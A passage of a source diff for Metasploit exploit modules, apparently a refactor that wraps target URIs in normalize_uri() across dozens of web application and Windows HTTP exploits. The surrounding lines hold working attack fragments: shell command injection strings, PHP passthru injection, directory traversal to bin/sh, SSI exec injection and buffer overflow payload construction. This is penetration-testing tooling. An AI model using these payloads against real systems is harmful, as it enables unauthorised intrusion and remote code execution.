-		urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"
+		urlconfigdir = normalize_uri(datastore['URI']) + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"
 
 		res = send_request_raw({
 			'uri'     => urlconfigdir,

--- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb
+++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 				{
 					'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
-		sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
+		sploit = normalize_uri(datastore['URI']) + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
 
 		res = send_request_raw({
 			'uri'     => sploit,

--- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb
+++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 			{
 				'sort' => '"].phpinfo().exit().$a["'
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		command = Rex::Text.uri_encode(payload.encoded)
-		sploit = datastore['URI'] + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'
+		sploit = normalize_uri(datastore['URI']) + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'
 
 		res = send_request_raw({
 			'uri'     => sploit,

--- a/modules/exploits/unix/webapp/barracuda_img_exec.rb
+++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 			{
 				'f' => ("../" * 8) + "etc/hosts"
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 			{
 				'f' => ("../" * 8) + %Q!bin/sh -c "echo 'YYY'; #{payload.encoded}; echo 'YYY'"|!

--- a/modules/exploits/unix/webapp/basilic_diff_exec.rb
+++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 
 		sig = rand_text_alpha(10)
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		print_status("Sending GET request...")
 
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 
 		res = send_request_cgi({

--- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
+++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# Obtain a valid image ID
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 				{
 					'action' => 'list'
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 				{
 					'local_graph_id' => m[1],

--- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
+++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending exploit request 1")
 		res = send_request_cgi(
 		{
-			'uri'    => datastore['URI'],
+			'uri'    => normalize_uri(datastore['URI']),
 			'method' => "POST",
 			'ctype' => 'application/x-www-form-urlencoded',
 			'data'   => data
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending exploit request 2")
 		res = send_request_cgi(
 		{
-			'uri'    => datastore['URI'],
+			'uri'    => normalize_uri(datastore['URI']),
 			'method' => "POST",
 			'ctype' => 'application/x-www-form-urlencoded',
 			'data'   => data
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		response = send_request_raw({
 			# Allow findsock payloads to work
 			'global' => true,
-			'uri' => datastore['URI']
+			'uri' => normalize_uri(datastore['URI'])
 		}, 5)
 
 		handler

--- a/modules/exploits/unix/webapp/coppermine_piceditor.rb
+++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-			'uri' => datastore['URI'] + '/picEditor.php'
+			'uri' => normalize_uri(datastore['URI']) + '/picEditor.php'
 		}, 25)
 
 		if (res and res.body =~ /Coppermine Picture Editor/i)
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'	      => datastore['URI'] + "/picEditor.php",
+			'uri'	      => normalize_uri(datastore['URI']) + "/picEditor.php",
 			'vars_post' =>
 				{
 					'angle' => angle,

--- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb
+++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_raw(
 			{
-				'uri' => datastore['URIPATH'],
+				'uri' => normalize_uri(datastore['URIPATH']),
 			}, 1)
 
 		if (res and res.body =~ /Spell Check complete/)
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		cmd = payload.encoded
 		data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
-		uri = datastore['URIPATH']
+		uri = normalize_uri(datastore['URIPATH'])
 
 		response = send_request_cgi(
 			{

--- a/modules/exploits/unix/webapp/egallery_upload_exec.rb
+++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
+++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
@@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')
 
 		req1 = send_request_cgi({
-			'uri'     => datastore['URI'],
+			'uri'     => normalize_uri(datastore['URI']),
 			'method'  => 'POST',
 			'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
 		}, 25)
 
 		req2 = send_request_raw({
-			'uri'     => datastore['URIOUT'],
+			'uri'     => normalize_uri(datastore['URIOUT']),
 		}, 25)
 
 	end

--- a/modules/exploits/unix/webapp/hastymail_exec.rb
+++ b/modules/exploits/unix/webapp/hastymail_exec.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		@uri = target_uri.path
+		@uri = normalize_uri(target_uri.path)
 		@uri << '/' if @uri[-1,1] != '/'
 		@session_id = ""
 		@peer = "#{rhost}:#{rport}"
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		@uri = target_uri.path
+		@uri = normalize_uri(target_uri.path)
 		@uri << '/' if @uri[-1,1] != '/'
 		@session_id = ""
 		@peer = "#{rhost}:#{rport}"

--- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb
+++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
@@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
 		res = send_request_raw(
@@ -91,8 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Static files
 		directory 	= '/images/stories/'
-		uri_base    = ''
-		uri_base << datastore['URI']
+		uri_base    = normalize_uri(datastore['URI'])
 		uri_base << '/' if uri_base[-1,1] != '/'
 		uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'
 
@@ -176,8 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Finally call the payload
 		print_status("Calling payload: #{cmdscript}.php")
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << directory + cmdscript + ".php"
 		res = send_request_raw({

--- a/modules/exploits/unix/webapp/mybb_backdoor.rb
+++ b/modules/exploits/unix/webapp/mybb_backdoor.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def uri
-		datastore['URI']
+		normalize_uri(datastore['URI'])
 	end
 
 	def check

--- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb
+++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb
@@ -63,11 +63,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}")
+		uri = normalize_uri(datastore['URI'])
+		print_status("Sending request to http://#{rhost}:#{rport}#{uri}")
 
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => datastore['URI'],
+			'uri'       => uri,
 			'headers'   => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
 			'vars_post' =>
 			{

--- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb
+++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
-				'uri'      => datastore['URI'],
+				'uri'      => normalize_uri(datastore['URI']),
 				'vars_get' =>
 					{
 						'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!

--- a/modules/exploits/unix/webapp/openx_banner_edit.rb
+++ b/modules/exploits/unix/webapp/openx_banner_edit.rb
@@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'www/admin/'
 		res = send_request_raw(
@@ -114,8 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Static files
 		img_dir     = 'images/'
-		uri_base    = ''
-		uri_base << datastore['URI']
+		uri_base    = normalize_uri(datastore['URI'])
 		uri_base << '/' if uri_base[-1,1] != '/'
 		uri_base << 'www/'
 

--- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb
+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Sending file save request")
 		response = send_request_raw({
-			'uri'	  => datastore['URI'] + "admin/file_manager.php/login.php?action=save",
+			'uri'	  => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save",
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		response = send_request_raw({
 			# Allow findsock payloads to work
 			'global' => true,
-			'uri' => datastore['URI'] + File.basename(filename)
+			'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename)
 		}, timeout)
 
 		handler

--- a/modules/exploits/unix/webapp/pajax_remote_exec.rb
+++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		args = %Q!{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "#{datastore['MOD']}", "method": "add(1,1);#{payload.encoded};$obj->add", "params": ["1", "5"] }!
 
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'method'   => 'POST',
 			'data'     => args,
 			'ctype'    => 'text/x-json'

--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def php_exploit
 		uris = []
 
-		tpath = datastore['PATH']
+		tpath = normalize_uri(datastore['PATH'])
 		if tpath[-1,1] == '/'
 			tpath = tpath.chop
 		end

--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
-				'uri'      => datastore['URI'],
+				'uri'      => normalize_uri(datastore['URI']),
 				'cookie'   => data
 			}, 25)
 

--- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
+++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		"</methodCall>";
 
 		res = send_request_cgi({
-				'uri'          => datastore['PATH'],
+				'uri'          => normalize_uri(datastore['PATH']),
 				'method'       => 'POST',
 				'ctype'        => 'application/xml',
 				'data'         => xml,

--- a/modules/exploits/unix/webapp/phpbb_highlight.rb
+++ b/modules/exploits/unix/webapp/phpbb_highlight.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		1.upto(32) do |x|
 
 		res = send_request_raw({
-				'uri'	=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
+				'uri'	=> normalize_uri(datastore['URI']) + '/viewtopic.php?topic=' + x.to_s,
 			}, 25)
 
 		if (res and res.body.match(/class="postdetails"/))
@@ -97,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		else
 
-			sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="
+			sploit = normalize_uri(datastore['URI']) + "/viewtopic.php?t=#{topic}&highlight="
 
 			case target.name
 			when /Automatic/
 				req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
 
 				res = send_request_raw({
-				'uri'	=> datastore['URI'] + req
+				'uri'	=> normalize_uri(datastore['URI']) + req
 				}, 25)
 
 				print_status("Trying to determine which attack method to use...")

--- a/modules/exploits/unix/webapp/phpmyadmin_config.rb
+++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# First, grab the session cookie and the CSRF token
 		print_status("Grabbing session cookie and CSRF token")
-		uri = datastore['URI'] + "scripts/setup.php"
+		uri = normalize_uri(datastore['URI']) + "/scripts/setup.php"
 		response = send_request_raw({ 'uri' => uri})
 		if !response
 			fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.")
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Now that we've got the cookie and token, send the evil
 		print_status("Sending save request")
 		response = send_request_raw({
-			'uri'	  => datastore['URI'] + "/scripts/setup.php",
+			'uri'	  => normalize_uri(datastore['URI']) + "/scripts/setup.php",
 			'method'  => 'POST',
 			'data'    => data,
 			'cookie'  => cookie,
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		response = send_request_raw({
 			# Allow findsock payloads to work
 			'global' => true,
-			'uri' => datastore['URI'] + "/config/config.inc.php"
+			'uri' => normalize_uri(datastore['URI']) + "/config/config.inc.php"
 		}, timeout)
 
 		handler

--- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
@@ -55,8 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		res = send_request_cgi(
 			{
@@ -113,8 +114,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@peer = "#{rhost}:#{rport}"
 
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		# Don't create a directory on the target since it complicates
 		# cleaning up after ourselves

--- a/modules/exploits/unix/webapp/redmine_scm_exec.rb
+++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		command = Rex::Text.uri_encode(payload.encoded)
-		urlconfigdir = datastore['URI'] + "repository/annotate?rev=`#{command}`"
+		urlconfigdir = normalize_uri(datastore['URI']) + "/repository/annotate?rev=`#{command}`"
 
 		res = send_request_raw({
 			'uri'     => urlconfigdir,

--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-			'uri'     => datastore['URI'] + '/index.php'
+			'uri'     => normalize_uri(datastore['URI']) + '/index.php'
 		}, 25)
 
 		if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/)
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def retrieve_password_hash(file)
 
 		res = send_request_raw({
-			'uri'    => datastore['URI'] + file,
+			'uri'    => normalize_uri(datastore['URI']) + file,
 		}, 25)
 
 		if (res and res.message == "OK" and res.body)
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def create_new_password(user, pass)
 
 		res = send_request_cgi({
-			'uri'     => datastore['URI'] + '/install03_cgi.php',
+			'uri'     => normalize_uri(datastore['URI']) + '/install03_cgi.php',
 			'method'  => 'POST',
 			'data'    => "user=#{user}&pass=#{pass}",
 		}, 25)
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def retrieve_session(user, pass)
 
 		res = send_request_cgi({
-			'uri'     => datastore['URI'] + "/login_cgi.php",
+			'uri'     => normalize_uri(datastore['URI']) + "/login_cgi.php",
 			'method'  => 'POST',
 			'data'    => "user=#{user}&pass=#{pass}",
 		}, 25)
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "\r\n--#{boundary}--"
 
 		res = send_request_raw({
-			'uri'	  => datastore['URI'] + "/upload_img_cgi.php",
+			'uri'	  => normalize_uri(datastore['URI']) + "/upload_img_cgi.php",
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
@@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def reset_original_password(hash, scriptlocation)
 
 		res = send_request_cgi({
-			'uri'	 => datastore['URI'] + scriptlocation,
+			'uri'	 => normalize_uri(datastore['URI']) + scriptlocation,
 			'method' => 'POST',
 			'data'	 => "hash=" + hash,
 		}, 25)
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}"
 
 		res = send_request_raw({
-			'uri'	=> datastore['URI'] + delete_path,
+			'uri'	=> normalize_uri(datastore['URI']) + delete_path,
 		}, 25)
 
 		if (res)

--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 
 		@peer = "#{rhost}:#{rport}"

--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_raw(
 			{
-				'uri'     => datastore['URI'] + "/tiki-index.php",
+				'uri'     => normalize_uri(datastore['URI']) + "/tiki-index.php",
 				'method'  => 'GET',
 				'headers' =>
 					{
@@ -160,8 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# when exploiting this vulnerability :)
 	#
 	def build_uri(f_val)
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << "/tiki-graph_formula.php?"
 
 		# Requirements:

--- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_raw(
 			{
-				'uri'     => datastore['URI'] + "/tiki-index.php",
+				'uri'     => normalize_uri(datastore['URI']) + "/tiki-index.php",
 				'method'  => 'GET',
 				'headers' =>
 					{
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def create_temp_file
-		url_jhot = datastore['URI'] + "/jhot.php"
+		url_jhot = normalize_uri(datastore['URI']) + "/jhot.php"
 
 		scode =
 			"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exe_command(cmd)
-		url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
+		url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
 
 		res = send_request_raw({
 			'uri'     => url_config,
@@ -194,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def remove_temp_file
-		url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
+		url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
 
 		res = send_request_raw({
 			'uri'     => url_config,

--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
 		@peer = "#{rhost}:#{rport}"

--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		# We need to ensure that this can be reached via POST
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		target_code = 200
 
 		print_status "Attempting to POST to #{uri}"
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		# We will be be passing this our langChoice values
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 
 		# Prepare PHP file contents
 		encoded_php_file = Rex::Text.uri_encode("<?php #{payload.encoded} ?>")

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -66,8 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def check
 		test_file = rand_text_alphanumeric(8+rand(8))
-		cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev='
-		test_url = datastore['URI'] + '/' + test_file
+		cmd_base = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers?rev='
+		test_url = normalize_uri(datastore['URI']) + '/' + test_file
 
 		# first see if it already exists (it really shouldn't)
 		res = send_request_raw({
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		rev = rand_text_numeric(1+rand(5))
 		rev << ' `' + payload.encoded + '`#'
-		query_str = datastore['URI'] + '/view/Main/TWikiUsers'
+		query_str = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers'
 		query_str << '?rev='
 		query_str << Rex::Text.uri_encode(rev)
 

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		content = rand_text_alphanumeric(16+rand(16))
 		test_file = rand_text_alphanumeric(8+rand(8))
-		cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
-		test_url = datastore['URI'] + '/view/Main/' + test_file
+		cmd_base = normalize_uri(datastore['URI']) + '/view/Main/WebSearch?search='
+		test_url = normalize_uri(datastore['URI']) + '/view/Main/' + test_file
 
 		# first see if it already exists (it really shouldn't)
 		res = send_request_raw({
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		search = rand_text_alphanumeric(1+rand(8))
 		search << "';" + payload.encoded + ";#\'"
 
-		query_str = datastore['URI'] + '/view/Main/WebSearch'
+		query_str = normalize_uri(datastore['URI']) + '/view/Main/WebSearch'
 		query_str << '?search='
 		query_str << Rex::Text.uri_encode(search)
 

--- a/modules/exploits/unix/webapp/xoda_file_upload.rb
+++ b/modules/exploits/unix/webapp/xoda_file_upload.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_raw({
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
 		sploit << [my_target.ret].pack("V")
 		sploit << payload.encoded
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi(
 				{
 					'method'  => 'POST',
-					'uri'     => target_uri.path,
+					'uri'     => normalize_uri(target_uri.path),
 					'headers' =>
 						{
 							'Transfer-Encoding' => my_data

--- a/modules/exploits/windows/http/coldfusion_fckeditor.rb
+++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi(
 			{
-				'uri'		=> "#{datastore['FCKEDITOR_DIR']}",
+				'uri'		=> normalize_uri(datastore['FCKEDITOR_DIR']),
 				'query'		=> "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",
 				'version'	=> '1.1',
 				'method'	=> 'POST',

--- a/modules/exploits/windows/http/manageengine_apps_mngr.rb
+++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb
@@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		], self.class)
 	end
 	def target_url
-		"http://#{rhost}:#{rport}#{datastore['URI']}"
+		uri = normalize_uri(datastore['URI'])
+		"http://#{rhost}:#{rport}#{uri}"
 	end
 	def exploit
 		# Make initial request to get assigned a session token

--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
 		res = send_request_cgi({
-			'uri'          => target_uri.to_s,
+			'uri'          => normalize_uri(target_uri.to_s),
 			'method'       => 'GET',
 			'headers'      =>
 			{

